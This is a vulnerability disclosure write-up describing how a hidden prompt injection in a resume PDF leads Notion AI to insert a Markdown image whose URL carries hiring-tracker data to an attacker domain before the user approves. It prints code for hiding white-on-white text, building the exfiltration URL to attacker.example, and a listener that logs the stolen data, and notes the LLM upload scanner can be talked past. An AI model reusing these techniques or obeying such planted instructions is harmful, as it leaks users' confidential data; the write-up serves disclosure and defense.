
Notion AI: Data Exfiltration

Notion AI is susceptible to data exfiltration via indirect prompt injection due to a vulnerability in which AI document edits are saved before user approval. UPDATE Jan 8th: It seems our initial disclosure was triaged by the HackerOne team before it ever reached the Notion team. Once Notion became aware of the issue, they took swift and immediate action, confirmed the vulnerability, and have since confirmed that the remediation is in production!

This hit the top of Hacker News!

Notion AI allows users to interact with their documents using natural language… but what happens when AI edits are made prior to user approval?

In this article, we document a vulnerability that leads Notion AI to exfiltrate user data (a sensitive hiring tracker document) via indirect prompt injection. Users are warned about an untrusted URL and asked for approval to interact with it - but their data is exfiltrated before they even respond.

We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.

Stealing Hiring Tracker Data with a Poisoned Resume

  1. The user uploads a resume (untrusted data) to their chat session.
    Here, the untrusted data source is a resume PDF, but a prompt injection could be stored in a web page, connected data source, or a Notion page.

    A prompt injection is concealed within a resume in whitespace between the candidate's title and their contact information.

    This document contains a prompt injection hidden in 1-point, white-on-white text, with a white square image covering the text for good measure (see the PDF sketch after this walkthrough). The LLM can read it without issue, but the document appears benign to the human eye.


    A Note on Defenses: Notion AI uses an LLM to scan document uploads and present a warning if a document is flagged as malicious. As this warning is triggered by an LLM, it can be bypassed by a prompt injection that convinces the evaluating model that the document is safe. For this research, we did not focus on bypassing this warning because the point of the attack is the exfiltration mechanism, not the method of injection delivery. In practice, an injection could easily be stored in a source that does not appear to be scanned, such as a web page, Notion page, or connected data source like Notion Mail.


  2. The user asks Notion AI for help updating a hiring tracker based on the resume.

    [Image: Notion interface with a hiring tracker document open on the left and Notion AI chat on the right. The user has attached a resume document to the chat and is asking 'Hey - please help me update the notes for the candidate'.]


  3. Notion AI is manipulated by the prompt injection to insert a malicious image into the hiring tracker.
    The prompt injection manipulates Notion AI to (1) construct a URL by collecting all of the text in the document and appending the data to an attacker-controlled domain, and (2) insert an ‘image’ into the Notion page using the constructed URL as the image source (a sketch of this payload follows the walkthrough).

    [Image: Notion AI displays a warning to the user, asking if they trust an external site. The URL shown already contains data from the user's hiring tracker.]

    Here, it appears as though nothing will happen until the user grants approval. However, unbeknownst to the user, the edit has already occurred before the prompt appears. When the edit occurred, the user’s browser made a request to the attacker’s server, attempting to retrieve the image. This request exfiltrates the document contents contained in the URL constructed by Notion AI.

    Whether or not the user accepts the edit, the attacker successfully exfiltrates the data.

  4. The attacker reads the sensitive hiring tracker data from their server logs.
    Once the user’s browser has made a request for the malicious image, the attacker can read the sensitive data contained in the URL from their request logs (a minimal listener sketch follows this walkthrough).

    [Image: The attacker's server logs hold data from the hiring tracker, including salary expectations, candidate notes, and other internal data.]

    In this attack, exfiltrated data included salary expectations, candidate feedback, internal role details, and other sensitive information such as diversity hiring goals.
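
To make step 1 concrete, below is a minimal sketch of how such a document could be produced, assuming the reportlab library. The filename, coordinates, and candidate details are hypothetical, and the actual injected instructions are omitted; this illustrates the hiding technique, not the proof-of-concept document itself.

```python
# Minimal sketch: hiding text in a PDF with 1-point, white-on-white type,
# plus a white rectangle drawn over it for good measure. Invisible to a
# human reader, but extracted as ordinary text by the PDF parser that
# feeds the LLM. (All values below are illustrative.)
from reportlab.lib.colors import black, white
from reportlab.lib.pagesizes import letter
from reportlab.pdfgen import canvas

c = canvas.Canvas("resume.pdf", pagesize=letter)

# Visible, benign resume content.
c.setFillColor(black)
c.setFont("Helvetica-Bold", 14)
c.drawString(72, 720, "Jane Doe - Senior Software Engineer")
c.setFont("Helvetica", 11)
c.drawString(72, 640, "jane.doe@example.com | (555) 555-0100")

# Hidden instructions in the whitespace between the title and contact info.
c.setFillColor(white)
c.setFont("Helvetica", 1)
c.drawString(72, 680, "(injected instructions to the AI would go here)")

# A white rectangle covering the hidden text, as described above.
c.rect(70, 676, 200, 10, fill=1, stroke=0)

c.save()
```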
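
To make step 3 concrete, below is a minimal sketch of the transformation the injected instructions coerce the model into performing. The attacker domain, path, and parameter name are hypothetical.

```python
# Minimal sketch: turn document text into a Markdown 'image' whose URL
# carries the data to an attacker-controlled domain. The injection asks
# the model to perform the equivalent of this function when editing the page.
from urllib.parse import quote

ATTACKER_DOMAIN = "https://attacker.example"  # hypothetical

def build_exfil_image(document_text: str) -> str:
    """Return Markdown for an 'image' whose URL embeds the document text."""
    return f"![logo]({ATTACKER_DOMAIN}/collect?q={quote(document_text)})"

print(build_exfil_image("Candidate: Jane Doe | Salary expectation: $180k"))
# -> ![logo](https://attacker.example/collect?q=Candidate%3A%20Jane%20Doe%20...)
```

The moment this Markdown is saved into the page, the user's browser tries to fetch the "image"; the GET request itself delivers the document contents, which is why the approval prompt arrives too late.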
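
And for step 4, a minimal attacker-side listener, using only the Python standard library; the port is hypothetical. Any request for the fake image lands in the log, query string and all.

```python
# Minimal sketch: log whatever data the constructed image URL carries.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse

class CollectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Decode and record the exfiltrated document contents.
        print("exfiltrated:", unquote(urlparse(self.path).query))
        # The response is irrelevant; the request itself was the exfiltration.
        self.send_response(404)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), CollectHandler).serve_forever()
```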

Additional Attack Surface

The Notion Mail AI drafting assistant is susceptible to rendering insecure Markdown images within email drafts, resulting in data exfiltration. If a user mentions an untrusted resource while drafting, content from the user’s query or other mentioned resources can be exfiltrated. For example: “Hey, draft me an email based on @untrusted_notion_page and @trusted_notion_page”.

The attack surface is reduced for Notion Mail’s drafting assistant as the system appears to only have access to data sources within the Notion ecosystem that are explicitly mentioned by the user (as opposed to Notion AI’s main offering, which supports web search, document upload, integrations, etc.).

Remediation Steps

  1. Institute a vetting process for connected data sources. Restrict the use of connectors that can access highly sensitive or highly untrusted data from: Settings > Notion AI > Connectors.

  2. To reduce the risk of untrusted data being processed in the workspace, admins can configure: Settings > Notion AI > AI Web Search > Enable web search for workspace > Off.

  3. Individual users should avoid including sensitive personal data that could be leveraged in a spearphishing attack when configuring personalization for Notion AI via: Settings > Notion AI > Personalization.

  4. Individual users can configure: Settings > Notion AI > AI Web Search > Require confirmation for web requests > On.

Note: Implementing these remediations will reduce the risk surface, but will not nullify the core vulnerability.

Recommendations for Notion

  1. Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI page creation or update outputs without explicit user approval.

  2. Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI mail drafts.

  3. Implement a strong Content Security Policy (CSP). This will prevent the browser from making network requests to unapproved external domains (a sketch follows this list).

  4. Ensure the CDN used to retrieve images for display in Notion, and image previews for display in Notion Mail, cannot be used as an open redirect to bypass the CSP that is set.
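
As one illustration of recommendation 3, below is a minimal, framework-agnostic sketch of a CSP whose img-src directive only permits the application's own origin and an approved CDN. The header value and CDN hostname are hypothetical, not Notion's actual policy.

```python
# Minimal sketch: a restrictive Content-Security-Policy attached to responses.
# With this policy, a Markdown 'image' pointing at attacker.example is
# blocked by the browser before any request (and thus any exfiltration) occurs.
CSP_VALUE = "default-src 'self'; img-src 'self' https://images.trusted-cdn.example"

def with_csp(headers: dict[str, str]) -> dict[str, str]:
    """Attach the CSP header to an outgoing response."""
    return {**headers, "Content-Security-Policy": CSP_VALUE}

print(with_csp({"Content-Type": "text/html"}))
```

This only holds if the approved CDN cannot be made to fetch arbitrary attacker-supplied URLs, which is exactly the open-redirect caveat in recommendation 4.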

Responsible Disclosure Timeline

12/24/2025: Initial report made via HackerOne
12/24/2025: Report acknowledged; an altered write-up is requested
12/24/2025: PromptArmor follows up with the requested format
12/29/2025: Report closed as Not Applicable
01/07/2026: Public disclosure